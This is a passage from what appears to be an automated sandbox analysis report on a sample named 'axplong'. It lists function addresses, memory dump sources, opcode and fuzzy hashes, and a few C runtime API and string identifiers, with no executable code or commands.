                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9721f977c2abd6bd1eff58899882101b6a901d4b3c04a5efd4731ce4d06e80cf
                                                                                                                                                                  • Instruction ID: 7da1b48fe6c902f8e09a6a6077a54a48d28192610a43aa81c5cf53aa62db1614
                                                                                                                                                                  • Opcode Fuzzy Hash: 9721f977c2abd6bd1eff58899882101b6a901d4b3c04a5efd4731ce4d06e80cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F2260B7F515144BDB0CCA9DDCA27ECB2E3AFD8214B0E803DA40AE3745EA79D9158648
                                                                                                                                                                  Function 00C66F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 61dbe23a8cb5075cc6623244d5cb0775d271411da62d9cb74a5699477b867391
                                                                                                                                                                  • Instruction ID: 5e4d989ffacb8156d17613c524362af5023c9387a4d419f313a946476c98d6f3
                                                                                                                                                                  • Opcode Fuzzy Hash: 61dbe23a8cb5075cc6623244d5cb0775d271411da62d9cb74a5699477b867391
                                                                                                                                                                  • Instruction Fuzzy Hash: AEB15071214609DFD725CF28C4C6B557BE0FF45368F258A59E8A9CF2A1C335EA92CB40
                                                                                                                                                                  Function 00C24AF0 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a6cd191248b5dedb74facfb1e9752c208f291c7f907ea9830650b022f8fe8f1b
                                                                                                                                                                  • Instruction ID: 9bd3a6b566615e0fd8a2e9a33bed8194b69d81d7ad2b3c594ee0c31573577546
                                                                                                                                                                  • Opcode Fuzzy Hash: a6cd191248b5dedb74facfb1e9752c208f291c7f907ea9830650b022f8fe8f1b
                                                                                                                                                                  • Instruction Fuzzy Hash: 1851C47060C7918FD319CF2D911563AFFE1AFD5200F084A9EE5EA87292D774DA48CB92
                                                                                                                                                                  Function 00C6777B Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3bf1a94b001a5beb3a10f1747235f861172df8f6d0d4fcf8dbd3b3be94ac1ee4
                                                                                                                                                                  • Instruction ID: afe64b84236f7cdf7f770c99a97239a2b472b509ceba90afebb297b911a4cd13
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bf1a94b001a5beb3a10f1747235f861172df8f6d0d4fcf8dbd3b3be94ac1ee4
                                                                                                                                                                  • Instruction Fuzzy Hash: 3321B673F204394B770CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                                                                                                                                                                  Function 00C6765B Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1d62d6cca0dcba2ea49fac5bb9225e02c238427e4856f01b078fa5b10a79b91c
                                                                                                                                                                  • Instruction ID: 4c2551e69b1563937a0358174183c67ffbcd52122c1b3c31ddff498dd13eaaae
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d62d6cca0dcba2ea49fac5bb9225e02c238427e4856f01b078fa5b10a79b91c
                                                                                                                                                                  • Instruction Fuzzy Hash: 1711A723F30C255A675C816D8C132BAA1D2DBD824031F433AD826E7284E9A4DE23D290
                                                                                                                                                                  Function 00C68720 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                  • Instruction ID: d8296728458f540f8633fd832d87abb51ea66819bc510b1c6c42a76293764469
                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                  • Instruction Fuzzy Hash: B2112B7B20014147DA348A3DD9F45B6A796EBC5321B3D437AF1614B758DE22EB4DD900
                                                                                                                                                                  Function 00C5645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a255e47e6232ddaafb0a524983f725e14c1b0db7e70cf411b4167870621d2da4
                                                                                                                                                                  • Instruction ID: 2896380daeec0b0adfe40947365021b62682e70e40716b61c7cc05827bf5bc0a
                                                                                                                                                                  • Opcode Fuzzy Hash: a255e47e6232ddaafb0a524983f725e14c1b0db7e70cf411b4167870621d2da4
                                                                                                                                                                  • Instruction Fuzzy Hash: 07E08C35190A48AFDF29BF18C898D593B9AEB51346F409800FC144B621CF76FED1EA84
                                                                                                                                                                  Function 00C5A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                  • Instruction ID: 9f09c5b824e9af18d19086f76f3d4feb08bbdd56eda6ade4f066b1d5bf958752
                                                                                                                                                                  • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                  • Instruction Fuzzy Hash: A2E04636911628EBCB15DB89890498AF6ACEB48B01F154196B901E3240C270DF44D7D8
                                                                                                                                                                  Function 00C54770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C547A7
                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C547AF
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C54838
                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C54863
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C548B8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                  • Opcode ID: 06e3d84536c3cb16c51163cd1a88f7fdc06fa3c965dd354229b66709777d1dfd
                                                                                                                                                                  • Instruction ID: e057cf66a989263559ff6333290cff15b5206090df6cc1e66098fe902289e235
                                                                                                                                                                  • Opcode Fuzzy Hash: 06e3d84536c3cb16c51163cd1a88f7fdc06fa3c965dd354229b66709777d1dfd
                                                                                                                                                                  • Instruction Fuzzy Hash: F651D838A002489BCF14DF68C885A9E7BB5EF0531DF148155EC18DB392D731EAC9DB94
                                                                                                                                                                  Function 00C570C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsrchr
                                                                                                                                                                  • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                  • API String ID: 1752292252-4019086052
                                                                                                                                                                  • Opcode ID: 0d9c032f94ba75399f7f2e91bbec39508c4bf552256d8f8c2bf34ce91d48a846
                                                                                                                                                                  • Instruction ID: 6ce64e4a508b1676ee425e8e68660c09dc962ae6f506793ef1a381cff5473c7e
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d9c032f94ba75399f7f2e91bbec39508c4bf552256d8f8c2bf34ce91d48a846
                                                                                                                                                                  • Instruction Fuzzy Hash: 59014E7F608A122226182418BC0363F179C9B82BB6715013BFD5CF73C3DE44DDC65198
                                                                                                                                                                  Function 00C26EC0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C27065
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
